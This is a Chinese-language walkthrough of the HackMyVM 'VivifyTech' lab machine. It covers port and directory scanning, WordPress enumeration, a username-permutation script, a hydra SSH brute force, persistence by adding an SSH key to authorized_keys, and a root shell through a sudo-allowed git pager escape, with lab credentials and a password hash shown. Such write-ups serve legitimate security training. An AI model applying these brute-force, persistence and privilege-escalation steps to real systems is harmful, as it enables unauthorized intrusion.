VivifyTech - hackmyvm

简介

靶机名称:VivifyTech

难度:简单

靶场地址:https://hackmyvm.eu/machines/machine.php?vm=VivifyTech

本地环境

虚拟机:vitual box

靶场IP(VivifyTech):192.168.56.119

跳板机IP(windows 11):192.168.56.1 192.168.190.100

渗透机IP(kali):192.168.190.131

扫描

nmap起手

nmap -sT -p0- 192.168.56.119 -oA nmapscan/ports ;ports=$(grep open ./nmapscan/ports.nmap | awk -F '/' '{print $1}' | paste -sd ',');echo $ports >> nmapscan/tcp_ports;
nmap -sT -sV -sC -O -p$ports 192.168.56.119 -oA nmapscan/detail

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-16 09:31 EDT
Nmap scan report for 192.168.56.119
Host is up (0.00034s latency).

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 9.2p1 Debian 2+deb12u1 (protocol 2.0)
| ssh-hostkey:
|   256 32:f3:f6:36:95:12:c8:18:f3:ad:b8:0f:04:4d:73:2f (ECDSA)
|_  256 1d:ec:9c:6e:3c:cf:83:f6:f0:45:22:58:13:2f:d3:9e (ED25519)
80/tcp    open  http    Apache httpd 2.4.57 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.57 (Debian)
3306/tcp  open  mysql   MySQL (unauthorized)
33060/tcp open  mysqlx?
| fingerprint-strings:
|   DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
|     Invalid message"
|     HY000
|   LDAPBindReq:
|     *Parse error unserializing protobuf message"
|     HY000
|   oracle-tns:
|     Invalid message-frame."
|_    HY000
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: WAP
Running: Actiontec embedded, Linux
OS CPE: cpe:/h:actiontec:mi424wr-gen3i cpe:/o:linux:linux_kernel
OS details: Actiontec MI424WR-GEN3I WAP
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.68 seconds

经典22和80。暴露了mysql服务在外面,因为有33060这个扩展端口,所以版本起码在8.0以上

http服务

啥啊这是......连个站都没了

随便目录扫描一下,好家伙直接全部爆出来了

feroxbuster -u http://192.168.56.119/ -t 20 -w $HVV_Tool/8_dict/seclist/Discovery/Web-Content/directory-list-2.3-medium.txt  -C 500  -d 3

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.10.3
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://192.168.56.119/
 🚀  Threads               │ 20
 📖  Wordlist              │ /home/kali/1_Tool/1_HVV/8_dict/seclist/Discovery/Web-Content/directory-list-2.3-medium.txt
 💢  Status Code Filters   │ [500]
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.10.3
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 3
 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET        9l       31w      276c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403      GET        9l       28w      279c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET       24l      127w    10359c http://192.168.56.119/icons/openlogo-75.png
301      GET        9l       28w      320c http://192.168.56.119/wordpress => http://192.168.56.119/wordpress/
200      GET      368l      933w    10701c http://192.168.56.119/
301      GET        9l       28w      332c http://192.168.56.119/wordpress/wp-includes => http://192.168.56.119/wordpress/wp-includes/
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/widgets.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/l10n.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/plugin.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/template.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/fonts.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-taxonomy.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-role.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-walker.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-tax-query.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-error.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-block-type.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-hook.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-list-util.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-site-query.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-oembed-controller.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/block-template-utils.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-theme-json-schema.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wpdb.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-http-streams.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-customize-widgets.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/link-template.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-recovery-mode.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/option.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/ms-default-constants.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/general-template.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/block-template.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/bookmark.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-paused-extensions-storage.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-duotone.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/cache-compat.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/functions.wp-styles.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/category.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/shortcodes.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/rss-functions.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-block.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-image-editor.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-user-request.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-classic-to-block-menu-converter.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-phpass.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/ms-site.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/nav-menu.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-block-supports.php
200      GET        1l        4w       29c http://192.168.56.119/wordpress/wp-includes/ms-files.php
301      GET        9l       28w      331c http://192.168.56.119/wordpress/wp-content => http://192.168.56.119/wordpress/wp-content/
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-theme.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/error-protection.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/ms-network.php
200      GET       48l       48w      439c http://192.168.56.119/wordpress/wp-includes/secrets.txt
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-term-query.php
301      GET        9l       28w      339c http://192.168.56.119/wordpress/wp-content/uploads => http://192.168.56.119/wordpress/wp-content/uploads/
301      GET        9l       28w      339c http://192.168.56.119/wordpress/wp-content/plugins => http://192.168.56.119/wordpress/wp-content/plugins/
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/post-thumbnail-template.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/pluggable-deprecated.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/author-template.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-recovery-mode-key-service.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/pluggable.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-block-parser-frame.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/kses.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-recovery-mode-link-service.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-locale-switcher.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-comment.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/theme-templates.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/ms-load.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-requests.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/ms-functions.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/comment.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/bookmark-template.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-theme-json-resolver.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-navigation-fallback.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-meta-query.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-customize-manager.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-block-patterns-registry.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/user.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/global-styles-and-settings.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-widget-factory.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-http-encoding.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/wp-db.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/load.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-customize-nav-menus.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-date-query.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-block-template.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/revision.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/post-template.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-block-editor-context.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-block-parser.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/embed.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/taxonomy.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-block-pattern-categories-registry.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-ajax-response.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-post.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/rewrite.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-application-passwords.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/formatting.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-block-parser-block.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-http-curl.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/atomlib.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/theme-previews.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/sitemaps.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-comment-query.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-http-cookie.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/feed.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-matchesmapregex.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/query.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-post-type.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-locale.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/deprecated.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-metadata-lazyloader.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-user-query.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/blocks.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/comment-template.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/capabilities.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-editor.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/default-constants.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/http.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/compat.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-dependency.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/rest-api.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-widget.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-feed-cache-transient.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-object-cache.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-rewrite.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/theme.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-theme-json-data.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-network.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-http-proxy.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/https-detection.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/post.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/category-template.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-recovery-mode-email-service.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/robots-template.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-roles.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-recovery-mode-cookie-service.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-dependencies.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-phpmailer.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-admin-bar.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/admin-bar.php
200      GET       86l      145w     1151c http://192.168.56.119/wordpress/wp-includes/theme-i18n.json
200      GET       17l       41w      316c http://192.168.56.119/wordpress/wp-includes/block-i18n.json
200      GET      326l      708w     7303c http://192.168.56.119/wordpress/wp-includes/theme.json
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-textdomain-registry.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-fatal-error-handler.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-query.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-block-list.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-user.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/functions.wp-scripts.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-network-query.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-embed.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/https-migration.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-pop3.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-session-tokens.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-block-type-registry.php
301      GET        9l       28w      338c http://192.168.56.119/wordpress/wp-content/themes => http://192.168.56.119/wordpress/wp-content/themes/
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/canonical.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-theme-json.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/version.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/style-engine.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-block-styles-registry.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-term.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-http-response.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/media-template.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/block-editor.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/post-formats.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/ms-deprecated.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-site.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/cron.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-oembed.php
301      GET        9l       28w      329c http://192.168.56.119/wordpress/wp-admin => http://192.168.56.119/wordpress/wp-admin/
301      GET        9l       28w      334c http://192.168.56.119/wordpress/wp-admin/user => http://192.168.56.119/wordpress/wp-admin/user/
301      GET        9l       28w      337c http://192.168.56.119/wordpress/wp-admin/network => http://192.168.56.119/wordpress/wp-admin/network/
301      GET        9l       28w      333c http://192.168.56.119/wordpress/wp-admin/css => http://192.168.56.119/wordpress/wp-admin/css/
301      GET        9l       28w      338c http://192.168.56.119/wordpress/wp-admin/includes => http://192.168.56.119/wordpress/wp-admin/includes/

知道是wordpress后,使用wpscan扫一下

bash 复制代码
wpscan --url http://192.168.56.119/wordpress --api-token=VjtWw...
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.25
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.56.119/wordpress/ [192.168.56.119]
[+] Started: Mon Jun 17 00:01:26 2024

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.57 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.56.119/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.56.119/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.56.119/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.56.119/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 6.4.1 identified (Insecure, released on 2023-11-09).
 | Found By: Rss Generator (Passive Detection)
 |  - http://192.168.56.119/wordpress/index.php/feed/, <generator>https://wordpress.org/?v=6.4.1</generator>
 |  - http://192.168.56.119/wordpress/index.php/comments/feed/, <generator>https://wordpress.org/?v=6.4.1</generator>
 |
 | [!] 4 vulnerabilities identified:
 |
 | [!] Title: WP 6.4-6.4.1 - POP Chain
 |     Fixed in: 6.4.2
 |     References:
 |      - https://wpscan.com/vulnerability/2afcb141-c93c-4244-bde4-bf5c9759e8a3
 |      - https://fenrisk.com/publications/blogpost/2023/11/22/gadgets-chain-in-wordpress/
 |
 | [!] Title: WordPress < 6.4.3 - Deserialization of Untrusted Data
 |     Fixed in: 6.4.3
 |     References:
 |      - https://wpscan.com/vulnerability/5e9804e5-bbd4-4836-a5f0-b4388cc39225
 |      - https://wordpress.org/news/2024/01/wordpress-6-4-3-maintenance-and-security-release/
 |
 | [!] Title: WordPress < 6.4.3 - Admin+ PHP File Upload
 |     Fixed in: 6.4.3
 |     References:
 |      - https://wpscan.com/vulnerability/a8e12fbe-c70b-4078-9015-cf57a05bdd4a
 |      - https://wordpress.org/news/2024/01/wordpress-6-4-3-maintenance-and-security-release/
 |
 | [!] Title: WP < 6.5.2 - Unauthenticated Stored XSS
 |     Fixed in: 6.4.4
 |     References:
 |      - https://wpscan.com/vulnerability/1a5c5df1-57ee-4190-a336-b0266962078f
 |      - https://wordpress.org/news/2024/04/wordpress-6-5-2-maintenance-and-security-release/

[+] WordPress theme in use: twentytwentyfour
 | Location: http://192.168.56.119/wordpress/wp-content/themes/twentytwentyfour/
 | Last Updated: 2024-04-02T00:00:00.000Z
 | Readme: http://192.168.56.119/wordpress/wp-content/themes/twentytwentyfour/readme.txt
 | [!] The version is out of date, the latest version is 1.1
 | [!] Directory listing is enabled
 | Style URL: http://192.168.56.119/wordpress/wp-content/themes/twentytwentyfour/style.css
 | Style Name: Twenty Twenty-Four
 | Style URI: https://wordpress.org/themes/twentytwentyfour/
 | Description: Twenty Twenty-Four is designed to be flexible, versatile and applicable to any website. Its collecti...
 | Author: the WordPress team
 | Author URI: https://wordpress.org
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 1.0 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://192.168.56.119/wordpress/wp-content/themes/twentytwentyfour/style.css, Match: 'Version: 1.0'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:00 <==============> (137 / 137) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[+] WPScan DB API OK
 | Plan: free
 | Requests Done (during the scan): 2
 | Requests Remaining: 23

[+] Finished: Mon Jun 17 00:01:33 2024
[+] Requests Done: 174
[+] Cached Requests: 5
[+] Data Sent: 48.24 KB
[+] Data Received: 307.614 KB
[+] Memory used: 256.867 MB
[+] Elapsed time: 00:00:07

信息收集-爆破

后面对着主题和版本找了半天poc,无果。回头又找了一圈,发现有一个secret.txt...

怎么说呢,放在这种目录下,还真是恶趣味。

根据这个作者的思路,接下来去收集用户。除了主页外,还有上面发布的文章The story behind VivifyTech,合起来如下

sancelisso
Sarah
Mark
Jake
Alex

使用用户名枚举脚本扩充一遍

python 复制代码
from datetime import datetime
import argparse

def generate_additional_combinations(parts):
    print(parts)
    combinations = set()
    # 如果名字由名和姓组成(两部分),生成特定格式
    if len(parts) == 2:
        # A全小写B首字母小写的情况
        combinations.add(parts[0].lower() + parts[1][0].lower() + parts[1][1:])
        combinations.add(parts[0].lower() + parts[1][0].lower())
        combinations.add(parts[0].upper() + parts[1][0].upper())

        combinations.add(parts[1].lower() + parts[0][0].lower())
        combinations.add(parts[1].upper() + parts[0][0].upper())
    print("combinations = > ",combinations)
    return combinations

def generate_usernames(usernames):
    generated_usernames = set()
    for name in usernames:
        parts = name.split()  # 按空格分割
        if '.' in name:
            parts = name.split('.')  # 按点号分割

        # 常见的用户名组合
        generated_usernames.add(name.lower())  # 全小写
        generated_usernames.add(name.upper())  # 全大写
        generated_usernames.add(''.join(part[0] for part in parts).lower())  # 首字母小写组合
        generated_usernames.add('.'.join(parts).lower())  # 点连接小写

        # 特殊的用户名组合
        generated_usernames.update(generate_additional_combinations(parts))

    return sorted(generated_usernames)

def read_usernames(filename):
    with open(filename, 'r') as file:
        return [line.strip() for line in file if line.strip()]

def main():
    parser = argparse.ArgumentParser(description='Generate possible usernames.')
    parser.add_argument('-f', '--input-file', required=True, help='Input file containing a list of usernames.')
    parser.add_argument('-o', '--output-file', default='output.txt', help='Output file for possible usernames.')

    args = parser.parse_args()

    usernames = read_usernames(args.input_file)
    new_usernames = generate_usernames(usernames)
    with open(args.output_file, 'w') as file:
        for username in new_usernames:
            file.write(username + '\n')

    print(f"Username combinations have been written to {args.output_file}")

if __name__ == "__main__":
    main()
ALEX
JAKE
MARK
SANCELISSO
SARAH
a
alex
j
jake
m
mark
s
sancelisso
sarah

首先用bp爆破wordpress后台,无果

然后试着用hydra爆ssh,成功爆出账密为sarah/bohicon

hydra -t 8 -L user.txt -P secrets.txt 192.168.56.119 ssh -I

成功得到在用户目录下得到user.txt

HMV{Y0u_G07_Th15_0ne_6543}

提权

先把攻击机的ssh公钥传上去维权

ssh-keygen
cd .ssh
echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIK5sWbMpzoFOhxwVIjKUYvvMce5kR6XSmnTp7u2TlCmW kali@kali" >> authorized_keys

先传个linpeas_fat.sh上去探路

❯ scp ./lin_fat.sh sarah@192.168.56.119:/tmp/
lin_fat.sh                                                  100%   25MB  50.8MB/s   00:00

然后发现配置文件中有数据库的配置信息

然后就没法子了,解不开()

mysql> select * from wp_users;
+----+------------+------------------------------------+---------------+--------------------+----------------------------------+---------------------+---------------------+-------------+--------------+
| ID | user_login | user_pass                          | user_nicename | user_email         | user_url                         | user_registered     | user_activation_key | user_status | display_name |
+----+------------+------------------------------------+---------------+--------------------+----------------------------------+---------------------+---------------------+-------------+--------------+
|  1 | sancelisso | $P$BPhGmUp9fmz6VHYL1FOPr33qtX.yyf1 | sancelisso    | test@localhost.com | http://192.168.177.133/wordpress | 2023-12-05 20:50:42 |                     |           0 | sancelisso   |
+----+------------+------------------------------------+---------------+--------------------+----------------------------------+---------------------+---------------------+-------------+--------------+

然后回到用户目录再看一眼,发现隐藏文件中有一个并不是默认文件夹

里面有一个文件Tasks.txt

sarah@VivifyTech:~/.private$ cat Tasks.txt
- Change the Design and architecture of the website
- Plan for an audit, it seems like our website is vulnerable
- Remind the team we need to schedule a party before going to holidays
- Give this cred to the new intern for some tasks assigned to him - gbodja:4Tch055ouy370N

得到账密为gbodja:4Tch055ouy370N

sudo -l提权

登录新用户后,起手sudo -l,看到有权限执行git

gbodja@VivifyTech:/home/sarah/.private$ sudo -l
Matching Defaults entries for gbodja on VivifyTech:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, !admin_flag, use_pty

User gbodja may run the following commands on VivifyTech:
    (ALL) NOPASSWD: /usr/bin/git

在gtfobins上详细描述了所有git提权到shell的方法

这里我选择了b。首先输入 sudo /usr/bin/git help config,然后输入!/bin/bash即可得到root权限

HMV{Y4NV!7Ch3N1N_Y0u_4r3_7h3_R007_8672}

结束

相关推荐
安於宿命3 分钟前
【Linux】简易版shell
linux·运维·服务器
丶Darling.6 分钟前
MIT 6.S081 Lab1: Xv6 and Unix utilities翻译
服务器·unix·lab·mit 6.s081·英文翻译中文
黄小耶@15 分钟前
linux常见命令
linux·运维·服务器
叫我龙翔16 分钟前
【计网】实现reactor反应堆模型 --- 框架搭建
linux·运维·网络
古驿幽情18 分钟前
CentOS AppStream 8 手动更新 yum源
linux·运维·centos·yum
BillKu19 分钟前
Linux(CentOS)安装 Nginx
linux·运维·nginx·centos
BillKu23 分钟前
Linux(CentOS)yum update -y 事故
linux·运维·centos
a2663789628 分钟前
解决yum命令报错“Could not resolve host: mirrorlist.centos.org
linux·运维·centos
小春学渗透30 分钟前
Day107:代码审计-PHP模型开发篇&MVC层&RCE执行&文件对比法&1day分析&0day验证
开发语言·安全·web安全·php·mvc
粤海科技君1 小时前
如何使用腾讯云GPU云服务器自建一个简单的类似ChatGPT、Kimi的会话机器人
服务器·chatgpt·机器人·腾讯云